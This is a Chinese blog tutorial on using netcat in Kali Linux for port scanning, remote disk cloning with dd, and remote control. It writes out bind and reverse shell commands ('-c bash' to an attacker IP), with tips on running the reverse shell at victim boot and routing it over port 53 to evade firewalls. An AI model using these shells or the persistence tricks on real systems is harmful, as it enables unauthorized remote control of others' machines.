kali-linux渗透测试之NC工具

最新推荐文章于 2024-06-23 21:56:36 发布
最新推荐文章于 2024-06-23 21:56:36 发布
阅读量1.5k 收藏 4
点赞数
分类专栏: kal渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/90214785
版权

**

端口扫描

**

root@kali:~# nc -nvz 192.168.1.110 1-65535
root@kali:~# nc -nvz 192.168.1.110 1-1024  //-z扫描模式  默认情况下,使用的是tcp协议探测,探测到也是tcp端口。
如果说想探测udp端口 nc -nvzu  加u

在这里插入图片描述
并不是每个扫描器扫描的结果都是正确的,因为过滤器或者防火墙会影响扫描结果。
**

远程克隆硬盘

**
电子取证的重要工作,当你怀疑对方服务器被入侵,你第一时间对对方硬盘做完整备份。nc的dd命令能够对硬盘块级别的备份,他会把磁盘上的每一个扇区、每一个位都会记录下来,即使文件在你电脑上删除,但是磁盘上是不会删掉的。

• A: root@kali:~# nc -lp 4444 | dd of=/dev/sda
• B: root@metasploitable:~# dd if=/dev/sda | nc -nv 192.168.1.100 4444 -q 1
• 远程电⼦子取证,可以将目标服务器硬盘远程复制,或者内存。

**

远程控制

**

root@kali:~# nc -lp 333 -c bash   //打开333端口  把shell传给 接入333端口的客户端

root@kali:~# nc -vn 192.168.83.130  3333

在这里插入图片描述
所列出来的内容就是开放端口的机器的文件内容。在当前窗口输入的所有命令,都是在操作开放端口的那一台机器。
注意:
我们攻击机去连接被攻击机的时候,由于防火墙的原因我们可能连接不到被攻击机的端口,这时候我们怎么办?我们可以让被攻击机去连接攻击机开放的端口。也就是说这时候攻击机开放端口,被攻击机连接。
攻击机:

nc -pl 333

被攻击机:

nc -vn 攻击机ip 333 -c bash

那么我们如何让给攻击机启动这条命令?我们可以把这条命令制作成脚本,让被攻击机一开机就启动命令。通常网络管理员会把内网服务器通向外网的访问端口禁止掉,但是也会开放一些端口比如dns的53端口,这时候我们就侦听53端口,或者开放54端口。如果安全做的非常好,他可能在内网里做一台机器做dns服务器。

1.Nc缺乏加密和⾝身份验证的能力
2.Ncat包含于nmap⼯工具包中

#allow:允许访问的主机
A:root@kali:~# ncat -c bash --allow 192.168.1.110 -vnl 333 --ssl    //allow允许某个IP连接,ssl进行加密
B:root@metasploitable:~# ncat -nv 192.168.1.100 333 --ssl
暮秋初九
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
E119-经典赛题-Linux操作系统渗透测试.docx
01-13
本文档总结了 Linux 操作系统渗透测试的经典赛题,涵盖了操作系统扫描、系统服务及版本扫描、文件内容提取、图片文件上传和权限提升等多方面的渗透测试技术。 操作系统扫描 在渗透测试过程中,使用 nmap 命令对...
kali自带防火墙失效,nc监听被阻断
m0_59456953的博客
12-19 535
报错:Unit firewalld.service not loaded.解决方法:重新安装即可。
KALI LINUX下的NC工具命令
hacker681的博客
12-22 3205
瑞士军刀 NETCAT-NC 招数1:(网络诊断)测试某个远程主机的【监听】端口是否可达 ◇使用场景 经常有这种需求,要判断某个主机的监听端口是否能连上。   导致监听端口【无法】,通常有两种原因: 其一,这个监听端口根本就【没开启】; 其二,监听端口虽然开启,但是被防火墙阻拦了。   对第1个原因,(如果你能在该主机上运行命令) 但对于第2个原因,netstat 就用不上了。这时候就可以用 nc...
部分kali工具使用简介
最新发布
m0_60794056的博客
06-23 668
范围在0-65535,其中固定端口0-1023,1024是保留端口,动态端口就是剩下的1024-65535。可以理解为传输数据用的。Xhydra称为九头蛇,是一款登录爆破神器,Hydar几乎可以爆破各种协议的登录,比如windows的远程桌面、ssh、ftp、路由交换设备等等。Ettercap最初是交换局域网的嗅探器,但在开发过程中,它获得了越来越多的功能,从而使其转变为强大而灵活的中间人攻击工具。Crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。
kali新手入门教学(13)--nc连接
azraelxuemo的博客
05-27 7261
nc 的全称为 NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat 可在这些连接上读写数据,直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲,NetCat 并不能产生 UDP 连接,因为 UDP 是一种无连接的协议。 nc 的命令行格式 nc 的基本命令行形式是 nc [options] host ports 其中 host 是要扫描的主机名或 IP地址 ports 要么是一个单独的端口,要么是一个端口范围(用 m-
第五章 kali Linux 渗透测试基本工具NC
stone的博客
03-28 494
NETCAT——NC ~网络工具中的瑞士军刀——小身材、大智慧 ~侦听模式/传输模式 ~telnet / 获取banner信息 ~传输文本信息 ~传输文件/目录 ~加密传输文件 ~远程控制/木马 ~加密所有流量 ~流媒体服务器 ~远程克隆硬盘 1、telnet/ banner 以链接163邮箱服务器为例: 寻找pop3的IP解析出来 ping pop3.163.com nc-vn 123.125....
kali渗透测试缓冲区溢出
02-09
Kali Linux是黑客和安全专业人士广泛使用的一款Linux发行版,它集成了大量渗透测试和安全分析工具。在渗透测试的过程中,缓冲区溢出攻击是一个重要的测试项目。Kali Linux提供了各种工具来发现和利用缓冲区溢出漏洞...
BOB1.0.1靶机渗透攻略.pdf
09-21
在网络安全渗透的领域中,Kali Linux 是一款广泛使用的操作系统,专门用于网络安全和渗透测试。本篇文档详细介绍了针对名为 Bob 1.0.1 的靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一...
Kali使用手册.docx
12-09
Kali Linux 1 1 Linux的常用命令 8 1.1 系统 8 1.1.1 内核和系统信息 8 1.1.2 硬件信息 8 1.1.3 加载状态和消息 9 1.1.4 用户 9 1.1.5 限制 10 1.1.6 运行级别 10 1.1.7 重设root密码 11 1.1.8 内核模块 ...
内网渗透综合实验.docx
08-29
接着,我们使用 nc 工具来连接 Kali Linux,实现反弹 shell。 四、DNS 隧道 DNS 隧道是指使用 DNS 协议来建立与目标机之间的连接,以便进行数据传输和命令控制。在本实验中,我们使用了 dnscat2 工具来实现 DNS ...
Linux利用nc命令监控服务器端口的方法
11-12
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了。在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现。
Aircrack-ng设置监听模式异常
kalilinux2的博客
08-03 6990
Aircrack-ng设置监听模式异常
nc ( netcat ) 总结 & 实验 note
ZQING
08-29 886
学习总结自国光大佬的 nc 命令教程 一文,然后进行实验验证。
8.kaliNC工具的使用方法
分享学习网络的点点滴滴
04-15 5366
nc工具的详细使用
Linux(kali)中nc/ncat实操
Selma003的博客
04-12 8098
ncat和nc命令的一些实战:文本传输、文件传输、远程控制。
【网络安全】nc的安装和简单操作
热门推荐
你在看屏幕的同时,屏幕也在注视着你
03-08 1万+
nc的安装和简单操作 一.下载nc(这里我用的是yum源的下载) 命令: yum install -y nc 二.实现连接通信操作 (我这里用的是两台虚拟机相互通信, 分别是contos 7 x86版 和 kali 2022版,这里可以把contos当作靶机,kali当作客户端) 1.查找kali的ip地址 命令:ifconfig 2.利用nc 打开端口进行监听(这里我打开的是9999端口) 命令:nc -lnvp 9999 这样就说明已经开始监听了。 3.打开contos 7 连接kali 命令:nc
Kali-nc(瑞士军刀)使用
兔子扛刀
10-08 4376
瑞士军刀的基本使用
kali linux渗透常用工具—NETCAT[瑞士军刀NC]
qq_41850110的博客
02-16 1147
NETCAT被誉为网络安全界的‘瑞士军刀’,初识或从事网络安全的人都不会陌生。 这是一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。 它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。 同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 NC–NATCAT(跨平台远程连接工...
Kali Linux Web渗透测试实战指南
Kali Linux Web渗透...《Kali Linux Web渗透测试秘籍中文版》是一本实用的工具书,适合网络安全专业人员和对Web渗透测试感兴趣的读者,它详细解释了如何在Kali Linux平台上进行专业级的Web安全评估和防御策略学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值